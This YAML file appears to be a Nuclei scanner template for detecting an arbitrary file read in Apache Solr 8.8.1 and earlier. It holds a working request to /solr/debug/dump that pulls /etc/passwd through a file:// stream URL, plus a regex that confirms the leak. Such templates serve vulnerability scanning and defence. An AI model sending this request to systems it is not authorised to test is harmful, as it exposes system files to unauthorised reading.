id: apache-solr-file-read

info:
  name: Apache Solr <= 8.8.1 Arbitrary File Read
  author: 0xParthJ
  severity: high
  reference:
    - https://twitter.com/Al1ex4/status/1382981479727128580
    - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
    - https://twitter.com/sec715/status/1373472323538362371
  tags: apache,solr,lfi

requests:
  - method: GET
    path:
            - '{{BaseURL}}/solr/debug/dump?stream.url=file:///etc/passwd&param=ContentStream'
              
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"
